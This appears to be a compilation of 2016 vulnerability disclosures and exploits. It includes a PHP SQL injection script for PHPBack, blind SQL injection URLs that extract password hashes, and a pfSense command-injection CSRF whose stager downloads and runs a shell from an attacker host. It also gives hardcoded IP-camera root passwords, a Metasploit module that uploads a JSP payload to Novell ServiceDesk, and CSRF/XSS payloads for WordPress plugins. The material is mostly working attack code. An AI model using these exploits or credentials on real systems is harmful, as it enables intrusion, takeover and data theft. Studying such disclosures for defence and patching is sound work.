echo "*** by hyp3rlinx *** \r\n";
exit();
}
$target="localhost";
$creds="email=$email&password=$pwd";
$fp = fsockopen("localhost", 80, $errno, $errstr, 30);
sock_chk($fp);
#authenticate
$out = "POST /phpback-1.3.0/action/login HTTP/1.0\r\n";
$out .= "Host: $target\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($creds) . "\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
fwrite($fp, $creds);
$phpsess="";
$res="";
while (!feof($fp)) {
$res .= fgets($fp, 128);
if(strpos($res,"\r\n\r\n")!==FALSE){break;}
}
$sess=get_session($fp);
function get_session($sock){
global $res;
$idx=strpos($res,"PHPSESSID");
$sess=substr($res,$idx,38);
return $sess;
}
#SQL Injection
$sql="search=1&orderby=title,extractvalue(0x0a,concat(0x0a,(select USER()), 0x0a, (select DATABASE()), 0x0a, (select VERSION())))\r\n";
$fp = fsockopen("localhost", 80, $errno, $errstr, 30);
sock_chk($fp);
$out = "POST /phpback-1.3.0/admin/ideas HTTP/1.0\r\n";
$out .= "Host: $target\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($sql) . "\r\n";
$out .= "Cookie: " . $sess."\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
fwrite($fp, $sql);
while (!feof($fp)) {
echo fgets($fp, 128);
}
fclose($fp);
function sock_chk(&$fp){
if (!$fp) {echo "Cant connect!";exit();}
}
?>
/*
Disclosure Timeline:
=====================================
Vendor Notification: April 17, 2016
Vendor Confirms: April 17, 2016
Vendor Release Fixed Version: April 19, 2016
April 19, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
Medium
Description:
==================================================
Request Method(s): [+] POST
Vulnerable Product: [+] PHPBack v1.3.0
Vulnerable Parameter(s): [+] 'orderby'
====================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. All content (c) hyp3rlinx.
by hyp3rlinx
*/
# Title: Blind Injection modified eCommerce 2.0.0.0 rev 9678
# Date: 16.04.2016
# Category: webapps
# Vendor Homepage: http://www.modified-shop.org/download
# Software Link: http://www.modified-shop.org/forum/index.php?action=downloads;sa=downfile&id=96
# Version: 2.0.0.0 rev 9678
# Tested on: Apache/2.4.7, PHP Version 5.5.9, Linux
# Exploit Author: Felix Maduakor
# Contact: Felix.Maduakor@rub.de
# CVE: CVE-2016-3694
Product Description:
modified eCommerce is an Open Source shopsoftware
Vulnerability Details:
Attackable are the GET-parameters 'orders_status' and 'customers_status' through 'easybillcsv.php':
File: [shoproot]/api/easybill/easybillcsv.php
[24] if (isset($_GET['token']) && $_GET['token'] == MODULE_EASYBILL_CSV_CRON_TOKEN) {
[25-61] ...
[62] } else {
[63] die('Direct Access to this location is not allowed.');
As default option the easybill-module is not installed and the constant MODULE_EASYBILL_CSV_CRON_TOKEN is not set. As long as the easybill-module is not installed, it is possible to bypass the restriction: [Shoproot]/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN
[35] if (count($_GET['orders_status']) > 0) {
[36] $_GET['orders_status'] = preg_replace("'[\r\n\s]+'", '', $_GET['orders_status']);
[37] $orders_status = explode(',', $_GET['orders_status']);
[38] $module->from_orders_status = implode("', '", $orders_status);
[39] }
[43] if (isset($_GET['customers_status'])) {
[44] $_GET['customers_status'] = preg_replace("'[\r\n\s]+'", '', $_GET['customers_status']);
[45] $customers_status = explode(',', $_GET['customers_status']);
[46] $module->from_customers_status = implode("', '", $customers_status);
[47] }
As you can see in lines 35-39 and 43-47 the GET-parameters 'orders_status' and 'customers_status' are not escaped, but formatted (removed whitespaces, replaced commas with "', '"). They will be set as local variables of the "$module"-object.
File: [shoproot][admin-folder]/includes/modules/system/easybillcsv.php
[63] $export_query = xtc_db_query("SELECT DISTINCT o.orders_id
[64] FROM ".TABLE_ORDERS." o
[65] JOIN ".TABLE_ORDERS_STATUS_HISTORY." osh
[66] ON o.orders_id = osh.orders_id
[67] WHERE (o.orders_status IN ('" . $this->from_orders_status . "')
[68] OR osh.orders_status_id IN ('" . $this->from_orders_status . "'))
[69] AND (o.last_modified >= '". date( "Y-m-d H:i:s", strtotime($this->from_order_date)) . "'
[70] OR o.date_purchased >= '". date( "Y-m-d H:i:s", strtotime($this->from_order_date)) . "')
[71] AND o.customers_status IN ('" . $this->from_customers_status . "')
[72] ORDER BY o.orders_id");
The unescaped GET-parameters get placed in the query on line 67, 68 and 71.
Through the ORDER BY statement (with the explicit table-references) it is not possible to use a union-based injection.
The injection cannot include whitespaces or commas.
POC [Proof of Concept]:
http://127.0.0.1/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or-sleep(5)/*&customers_status=*/%23
Will result in following query and execute the sleep-function for 5 seconds:
SELECT DISTINCT o.orders_id
FROM ".TABLE_ORDERS." o
JOIN ".TABLE_ORDERS_STATUS_HISTORY." osh
ON o.orders_id = osh.orders_id
WHERE (o.orders_status IN ('-111'))or-sleep(5)/*
long comment
*/#comment
ORDER BY o.orders_id
There are multiple ways to bypass the whitespace/comma-filter. A possible way to check if the first character of the admin-hash is '$' would be:
http://127.0.0.1/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or(Select(case(36)when(ascii(substring(`customers_password`FROM(1)FOR(1))))then-sleep(5)End)from`customers`where`customers_id`=1)/*&customers_status=*/%23
Timeline
-----
[16.04.2016] Reporting vulnerability to vendor
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
PfSense Community Edition Multiple Vulnerabilities
Affected versions: PfSense Community Edition <= 2.2.6
PDF:
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
+-----------+
|Description|
+-----------+
The pfSense community edition firewall is vulnerable to multiple
vulnerabilities, including remote code execution via command injection
as an authenticated non-administrative user, stored and reflected
cross-site scripting.
+------------+
|Exploitation|
+------------+
==Command Injection==
The status_rrd_graph_img.php page is vulnerable to command injection via
the graph GET parameter. A non-administrative authenticated attacker
having access privileges to the graph status functionality can inject
arbitrary operating system commands and execute them in the context of
the root user. Although input validation is performed on the graph
parameter through a regular expression filter, the pipe character is not
removed. Octal characters sequences can be used to encode a payload,
bypass the filter for illegal characters, and create a PHP file to
download and execute a malicious file (i.e. reverse shell) from a remote
attacker controlled host.
[Octal-encoded PHP Stager]
stager = (
'echo \'<?php $shell =
file_get_contents("http://[ATTACKER_IP]/shell.elf");' +
'file_put_contents("myshell.elf", $shell);' +
'system("chmod 755 myshell.elf && ./myshell.elf"); ?> \' > shellexec'
)
encoded_stager = ''
for c in stager:
encoded_stager += "\\\\%03d" %(int(oct(ord(c))))
print encoded_stager
[CSRF POC]
<html>
<head>
<script>
function sploit() {
var query = "database=-throughput.rrd&graph=file|printf
[ENCODED_STAGER]|sh|echo ";
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://<target>/status_rrd_graph_img.php?" +
query, true);
xhr.withCredentials = true;
xhr.send();
setTimeout(shellexec, 2000);
}
function shellexec() {
document.csrf_exploit_exec.submit();
}
</script>
</head>
<body onload="sploit();">
<form name="csrf_exploit_exec"
action="https://<target>/status_rrd_graph_img.php">
<input type="hidden" name="database" value="-throughput.rrd" />
<input type="hidden" name="graph" value="file|php shellexec|echo " />
</form>
</body>
</html>
==Cross-site Scripting==
Multiple instances of stored and reflected cross-scripting
vulnerabilities exist in the web interface of the application. An
authenticated attacker with limited privileges can run arbitrary
JavaScript code in the context of admin users’ session and extend their
access to administrative areas of the application (i.e. command prompt
functionality).
Param => descr
Method => POST
URL => /system_gateways_edit.php
Payload => <script>alert(1)</script>
Render => /system_gateways_groups_edit.php
Type => Stored
Param => container
Method => POST
URL => /firewall_shaper_layer7.php
Payload => "><script>alert(1)</script>
Render => /firewall_shaper_layer7.php
Type => Reflected
Param => newname
Method => POST
URL => /firewall_shaper_vinterface.php
Payload => "><script>alert(1)</script>
Render => /firewall_shaper_vinterface.php
Type => Reflected
+----------+
| Solution |
+----------+
Upgrade to pfSense 2.3. This may be performed in the web interface or
from the console.
+------------+
| Timeline |
+------------+
10/02/2016 – Initial disclosure to pfSense.
11/02/2016 – Vendor confirms receipt of advisory and provides fixes.
16/02/1016 – Sent follow up email about public release.
16/02/2016 – Vendor requests advisory disclosure after release of new
software build.
12/04/2016 – Release of patched software build and vendor disclosure of
security advisories.
15/04/2016 – Public disclosure of security advisory.
+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
+------------+
| References |
+------------+
https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
https://www.pfsense.org/security/advisories/pfSense-SA-16_02.webgui.asc
Exploit Title: TH692- Outdoor P2P HD Waterproof IP Camera hardcoded credentials
Date: 4/16/2016
Exploit Author: DLY
Vendor: TENVIS Technology Co., Ltd
Product: TH692- Outdoor P2P HD Waterproof IP Camera
Product webpage: http://www.tenvis.com/th-692-outdoor-p2p-hd-waterproof-ip-camera-p-230.html
Affected version: TH692C-V. 16.1.16.1.1.4
firmware download link: http://download.tenvis.com/files/updatefiles/UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov
user: Mroot
pass:cat1029
user:Wproot
pass: cat1029
root@kali:~# strings UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov.1 | grep root
rootpath
rootfs crc %lx
------------------start upgrade rootfs------------------
------------------end upgrade rootfs------------------
bootargs=mem=74M console=ttyAMA0,115200 root=/dev/mtdblock2 rootfstype=jffs2 mtdparts=hi_sfc:256K(boot),2560K(kernel),11520K(rootfs),1M(config),64K(key),960K(ext)
nfsroot
7root
Bmount -t nfs -o nolock 192.168.0.99:/home/bt/vvvipc_develop/rootfs_target /nfsroot
k01000100 rootbox nohelp info
root::0:
Mroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh
Wproot:$1$d3VPdE0x$Ztn09cyReJy5PynZgwCbw0:0:0::/root:/bin/sh
nfsroot
pivot_root
xswitch_root
chroot
nfsroot
root@kali:~# john --show ipcamhashes
Mroot:cat1029:0:0::/root:/bin/sh
Wproot:cat1029:0:0::/root:/bin/sh
2 password hashes cracked, 0 left
Dear OffSec,
Here is the vulnerability detail as I submitted
*# Exploit Title: Webutler CMS Cross-Site Request Forgery*
*# Date: 18 April 2016*
*# Exploit Author: Keerati T. (Post)*
*# Vendor Homepage: http://webutler.de/en <http://webutler.de/en>*
*# Software Link: http://webutler.de/download/webutler_v3.2.zip
<http://webutler.de/download/webutler_v3.2.zip>*
*# Version: 3.2*
*# Tested on: Linux*
*1.Description*
The Webutler is a simple online page editor for static HTML files.
Webmasters can provide a simple login option for image and text editing to
their customers. The Webutler is a tool for websites or projects to be
implemented with a small effort. The project has grown over the years and
now you can do a lot of things with it.
The all of administrative function allow any users to perform HTTP request
without verify the request. This exploit can be performed while the logged
on user (administrator) visit malicious web page that embedded HTML form.
*2. Proof of Concept*
Only change password function PoC, But other function (add page, delete
page, etc..) can be exploited.
<html>
<body>
<form action="http://10.0.0.102/webutler/admin/system/save.php"
method="POST">
<input type="hidden" name="saveuser" value="1" />
<!-- administrator user name is "root" -->
<input type="hidden" name="username" value="root" />
<input type="hidden" name="userpass1" value="111111" />
<input type="hidden" name="userpass2" value="111111" />
<input type="hidden" name="userlang" value="en" />
</form>
</body>
<script>document.forms[0].submit();</script>
</html>
*3. Timeline*
11 Apr 2016 - Vulnerability discover.
11 Apr 2016 - No main contact available on vendor web page. Ask related
contact that shown on vendor web page instead.
18 Apr 2016 - No response from related contact and vulnerability disclosed.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ServiceDesk Authenticated File Upload',
'Description' => %q{
This module exploits an authenticated arbitrary file upload via directory traversal
to execute code on the target. It has been tested on versions 6.5 and 7.1.0, in
Windows and Linux installations of Novell ServiceDesk, as well as the Virtual
Appliance provided by Novell.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-1593' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/novell-service-desk-7.1.0.txt' ],
[ 'URL', 'http://seclists.org/bugtraq/2016/Apr/64' ]
],
'Platform' => %w{ linux win },
'Arch' => ARCH_X86,
'DefaultOptions' => { 'WfsDelay' => 15 },
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Novell ServiceDesk / Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X86
}
],
[ 'Novell ServiceDesk / Windows',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
],
'Privileged' => false, # Privileged on Windows but not on (most) Linux targets
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 30 2016'
))
register_options(
[
OptPort.new('RPORT',
[true, 'The target port', 80]),
OptString.new('USERNAME',
[true, 'The username to login as', 'admin']),
OptString.new('PASSWORD',
[true, 'Password for the specified username', 'admin']),
OptString.new('TRAVERSAL_PATH',
[false, 'Traversal path to tomcat/webapps/LiveTime/'])
], self.class)
end
def get_version
res = send_request_cgi({
'uri' => normalize_uri('LiveTime','WebObjects','LiveTime.woa'),
'method' => 'GET',
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
}
})
if res && res.code == 200 && res.body.to_s =~ /\<p class\=\"login-version-title\"\>\Version \#([0-9\.]+)\<\/p\>/
return $1.to_f
else
return 999
end
end
def check
version = get_version
if version <= 7.1 && version >= 6.5
return Exploit::CheckCode::Appears
elsif version > 7.1
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Unknown
end
end
def pick_target
return target if target.name != 'Automatic'
print_status("#{peer} - Determining target")
os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
traversal_paths = []
if datastore['TRAVERSAL_PATH']
traversal_paths << datastore['TRAVERSAL_PATH'] # add user specified or default Virtual Appliance path
end
# add Virtual Appliance path plus the traversal in a Windows or Linux self install
traversal_paths.concat(['../../srv/tomcat6/webapps/LiveTime/','../../Server/webapps/LiveTime/'])
# test each path to determine OS (and correct path)
traversal_paths.each do |traversal_path|
jsp_name = upload_jsp(traversal_path, os_finder_payload)
res = send_request_cgi({
'uri' => normalize_uri('LiveTime', jsp_name),
'method' => 'GET',
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
},
'cookie' => @cookies
})
if res && res.code == 200
if res.body.to_s =~ /Windows/
@my_target = targets[2]
else
# Linux here
@my_target = targets[1]
end
if traversal_path.include? '/srv/tomcat6/webapps/'
register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name)
else
register_files_for_cleanup('../webapps/LiveTime/' + jsp_name)
end
return traversal_path
end
end
return nil
end
def upload_jsp(traversal_path, jsp)
jsp_name = Rex::Text.rand_text_alpha(6+rand(8)) + ".jsp"
post_data = Rex::MIME::Message.new
post_data.add_part(jsp, "application/octet-stream", 'binary', "form-data; name=\"#{@upload_form}\"; filename=\"#{traversal_path}#{jsp_name}\"")
data = post_data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(@upload_url),
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
},
'cookie' => @cookies,
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if not res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Failed to upload payload...")
else
return jsp_name
end
end
def create_jsp
opts = {:arch => @my_target.arch, :platform => @my_target.platform}
payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
exe = generate_payload_exe(opts)
base64_exe = Rex::Text.encode_base64(exe)
native_payload_name = rand_text_alpha(rand(6)+3)
ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
var_raw = Rex::Text.rand_text_alpha(rand(8) + 3)
var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
var_buf = Rex::Text.rand_text_alpha(rand(8) + 3)
var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3)
var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3)
if @my_target['Platform'] == 'linux'
var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
chmod = %Q|
Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
Thread.sleep(200);
|
var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
cleanup = %Q|
Thread.sleep(200);
Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
|
else
chmod = ''
cleanup = ''
end
jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
try {
String #{var_buf} = "#{base64_exe}";
BASE64Decoder #{var_decoder} = new BASE64Decoder();
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
String #{var_path} = #{var_tmp}.getAbsolutePath();
BufferedOutputStream #{var_ostream} =
new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
#{chmod}
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
#{cleanup}
} catch (Exception e) {
}
%>
|
jsp = jsp.gsub(/\n/, '')
jsp = jsp.gsub(/\t/, '')
jsp = jsp.gsub(/\x0d\x0a/, "")
jsp = jsp.gsub(/\x0a/, "")
return jsp
end
def exploit
version = get_version
# 1: get the cookies, the login_url and the password_form and username form names (they varies between versions)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/LiveTime/WebObjects/LiveTime.woa'),
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
}
})
if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/
login_url = $2
@cookies = res.get_cookies
if res.body.to_s =~ /type\=\"password\" name\=\"([\w\.]+)\" \/\>/
password_form = $1
else
# we shouldn't hit this condition at all, this is default for v7+
password_form = 'password'
end
if res.body.to_s =~ /type\=\"text\" name\=\"([\w\.]+)\" \/\>/
username_form = $1
else
# we shouldn't hit this condition at all, this is default for v7+
username_form = 'username'
end
else
fail_with(Failure::NoAccess, "#{peer} - Failed to get the login URL.")
end
# 2: authenticate and get the import_url
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(login_url),
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
},
'cookie' => @cookies,
'vars_post' => {
username_form => datastore['USERNAME'],
password_form => datastore['PASSWORD'],
'ButtonLogin' => 'Login'
}
})
if res && res.code == 200 &&
(res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above
res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/) # v6.5
import_url = $1
else
# hmm either the password is wrong or someone else is using "our" account.. .
# let's try to boot him out
if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ &&
res.body.to_s =~ /This account is in use on another system/
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(login_url),
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
},
'cookie' => @cookies,
'vars_post' => {
username_form => datastore['USERNAME'],
password_form => datastore['PASSWORD'],
'ButtonLoginOverride' => 'Login'
}
})
if res && res.code == 200 &&
(res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above
res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/) # v6.5
import_url = $1
else
fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.")
end
else
fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.")
end
end
# 3: get the upload_url
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(import_url),
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
},
'cookie' => @cookies,
'vars_post' => {
'ButtonImport' => 'Import'
}
})
if res && res.code == 200 &&
(res.body.to_s =~ /id\=\"clientImportUploadForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above
res.body.to_s =~ /\<form method\=\"post\" enctype\=\"multipart\/form-data\" action\=\"([\w\/\.]+)\"\>/) # v6.5
@upload_url = $1
else
fail_with(Failure::Unknown, "#{peer} - Failed to get the upload URL.")
end
if res.body.to_s =~ /\<input type\=\"file\" name\=\"([0-9\.]+)\" \/\>/
@upload_form = $1
else
# go with the default for 7.1.0, might not work with other versions...
@upload_form = "0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"
end
# 4: target selection
@my_target = nil
# pick_target returns the traversal_path and sets @my_target
traversal_path = pick_target
if @my_target.nil?
fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.")
else
print_status("#{peer} - Selected target #{@my_target.name} with traversal path #{traversal_path}")
end
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload.
if @my_target['Platform'] == 'linux' && payload_instance.name =~ /Windows/
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
end
# 5: generate the JSP with the payload
jsp = create_jsp
print_status("#{peer} - Uploading payload...")
jsp_name = upload_jsp(traversal_path, jsp)
if traversal_path.include? '/srv/tomcat6/webapps/'
register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name)
else
register_files_for_cleanup('../webapps/LiveTime/' + jsp_name)
end
# 6: pwn it!
print_status("#{peer} - Requesting #{jsp_name}")
send_request_raw({'uri' => normalize_uri('LiveTime', jsp_name)})
handler
end
end
I would like to disclose CSRF and stored XSS vulnerability in Kento post view counter plugin version 2.8 .
The vulnerable Fields for XSS are
kento_pvc_numbers_lang
kento_pvc_today_text
kento_pvc_total_text
The combination of CSRF and XSS in this plugin can lead to huge damage of the website, as the two fields kento_pvc_today_text and kento_pvc_total_text are reflected on all authenticated users as well as non-authenticated user ,all the post have a footer which shows this two parameter reflected in them ,so if an attacker successfully attacks a website almost all the pages on that website will execute the malicious javascript payload on all the clients browsers visiting that website.every user visiting the website will be affected.
The plugin can be found at https://wordpress.org/plugins/kento-post-view-counter/
This CSRF is tested on latest wordpress installation 4.4.2 using firefox browser. and chrome.
The Code for CSRF.html is
<html>
<body>
<form action="http://targetsite/wp-admin/admin.php?page=kentopvc_settings" method="POST">
<input type="hidden" name="kentopvc_hidden" value="Y" />
<input type="hidden" name="option_page" value="kento_pvc_plugin_options" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="_wpnonce" value="" />
<input type="hidden" name="_wp_http_referer" value="" />
<input type="hidden" name="kento_pvc_posttype[post]" value="1" />
<input type="hidden" name="kento_pvc_posttype[page]" value="1" />
<input type="hidden" name="kento_pvc_posttype[attachment]" value="1" />
<input type="hidden" name="kento_pvc_posttype[revision]" value="1" />
<input type="hidden" name="kento_pvc_posttype[nav_menu_item]" value="1" />
<input type="hidden" name="kento_pvc_numbers_lang" value="" />
<input type="hidden" name="kento_pvc_today_text" value=""<script>alert(1);</script><img src="b" />
<input type="hidden" name="kento_pvc_total_text" value="" />
<input type="hidden" name="Submit" value="Save Changes" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
The Vulnerable page is
wp-content\plugins\kento-post-view-counter\kento-pvc-admin.php
The code Reponsible for XSS :
if($_POST['kentopvc_hidden'] == 'Y') {
//Form data sent
if(empty($_POST['kento_pvc_hide']))
{
$kento_pvc_hide ="";
}
else
{
$kento_pvc_hide = $_POST['kento_pvc_hide'];
}
update_option('kento_pvc_hide', $kento_pvc_hide);
if(empty($_POST['kento_pvc_posttype']))
{
$kento_pvc_posttype ="";
}
else
{
$kento_pvc_posttype = $_POST['kento_pvc_posttype'];
}
update_option('kento_pvc_posttype', $kento_pvc_posttype);
if(empty($_POST['kento_pvc_uniq']))
{
$kento_pvc_uniq ="";
}
else
{
$kento_pvc_uniq = $_POST['kento_pvc_uniq'];
}
update_option('kento_pvc_uniq', $kento_pvc_uniq);
$kento_pvc_numbers_lang = $_POST['kento_pvc_numbers_lang'];
update_option('kento_pvc_numbers_lang', $kento_pvc_numbers_lang);
$kento_pvc_today_text = $_POST['kento_pvc_today_text'];
update_option('kento_pvc_today_text', $kento_pvc_today_text);
$kento_pvc_total_text = $_POST['kento_pvc_total_text'];
update_option('kento_pvc_total_text', $kento_pvc_total_text);
--------------------------snip-----------------------
------------------snip ------------------------------
<input type="text" size="20" name="kento_pvc_numbers_lang" id="kento-pvc-numbers-lang" value ="<?php if (isset($kento_pvc_numbers_lang)) echo $kento_pvc_numbers_lang; ?>" placeholder="0,1,2,3,4,5,6,7,8,9" /><br />**Write numbers in your language as following 0,1,2,3,4,5,6,7,8,9<br />
Left blank if you are in English.
<tr valign="top">
<th scope="row">Text For Today View</th>
<td style="vertical-align:middle;">
<input type="text" size="20" name="kento_pvc_today_text" id="kento-pvc-today-text" value ="<?php if (isset($kento_pvc_today_text)) echo $kento_pvc_today_text; ?>" placeholder="Views Today " />
</td>
</tr>
<tr valign="top">
<th scope="row">Text For Total View</th>
<td style="vertical-align:middle;">
<input type="text" size="20" name="kento_pvc_total_text" id="kento-pvc-total-text" value ="<?php if (isset($kento_pvc_total_text)) echo $kento_pvc_total_text; ?>" placeholder="Total Views " />
</td>
</tr>
No anti-CSRF token used on this form :
All though the WordPress sends the _wpnonce value but it does not protect this form against CSRF.
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
I would like to disclose CSRF and stored XSS vulnerability in Wordpress
plugin LeenkMe version 2.5.0.
The plugin can be found at https://wordpress.org/plugins/leenkme/
In the page wp-content/plugins/leenkme/facebook.php
XSS vulnerable Fields are :
- facebook_message
- facebook_linkname
- facebook_caption
- facebook_description
- default_image
- _wp_http_referer
This CSRF is tested on latest wordpress installation 4.4.2 using firefox
browser.
The Code for CSRF.html is
<html>
<body onload="document.forms['xss'].submit()" >
<form name="xss" action="
http://127.0.0.1/wp/wp-admin/admin.php?page=leenkme_facebook" method="POST">
<input type="hidden" name="facebook_profile" value="on" />
<input type="hidden" name="fb_publish_wpnonce" value="" />
<input type="hidden" name="_wp_http_referer" value="XSS" />
<input type="hidden" name="facebook_message" value="XSS" />
<input type="hidden" name="facebook_linkname" value="XSS" />
<input type="hidden" name="facebook_caption" value="XSS" />
<input type="hidden" name="facebook_description" value="
</textarea><script>prompt();</script>" />
<input type="hidden" name="default_image" value="XSS" />
<input type="hidden" name="message_preference" value="author" />
<input type="hidden" name="clude" value="in" />
<input type="hidden" name="publish_cats[]" value="0" />
<input type="hidden" name="update_facebook_settings"
value="Save Settings" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
The vulnerable page is
wp-content/plugins/leenkme/facebook.php
The vulnerable code producing XSS is
if ( !empty( $_REQUEST['facebook_message'] ) )
$user_settings['facebook_message'] = $_REQUEST['facebook_message'];
else
$user_settings['facebook_message'] = '';
if ( !empty( $_REQUEST['facebook_linkname'] ) )
$user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname'];
else
$user_settings['facebook_linkname'] = '';
if ( !empty( $_REQUEST['facebook_caption'] ) )
$user_settings['facebook_caption'] = $_REQUEST['facebook_caption'];
else
$user_settings['facebook_caption'] = '';
if ( !empty( $_REQUEST['facebook_description'] ) )
$user_settings['facebook_description'] = $_REQUEST['facebook_description'];
-------------------------
-------------------------
-------------------------
snip
------------------------
-------------------------
--------------------------
<td><textarea name="facebook_message" style="width: 500px;"
maxlength="400"><?php
echo $user_settings['facebook_message']; ?></textarea></td>
</tr>
<tr>
<td><?php _e( 'Default Link Name:', 'leenkme'
); ?></td>
<td><input name="facebook_linkname"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_linkname']; ?>" maxlength="100"/></td>
</tr>
<tr>
<td><?php _e( 'Default Caption:', 'leenkme' );
?></td>
<td><input name="facebook_caption"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_caption']; ?>" maxlength="100"/></td>
</tr>
<tr>
<td style='vertical-align: top; padding-top:
5px;'><?php _e( 'Default Description:', 'leenkme' ); ?></td>
<td><textarea name="facebook_description"
style="width: 500px;" maxlength="300"><?php echo
$user_settings['facebook_description']; ?></textarea></td>
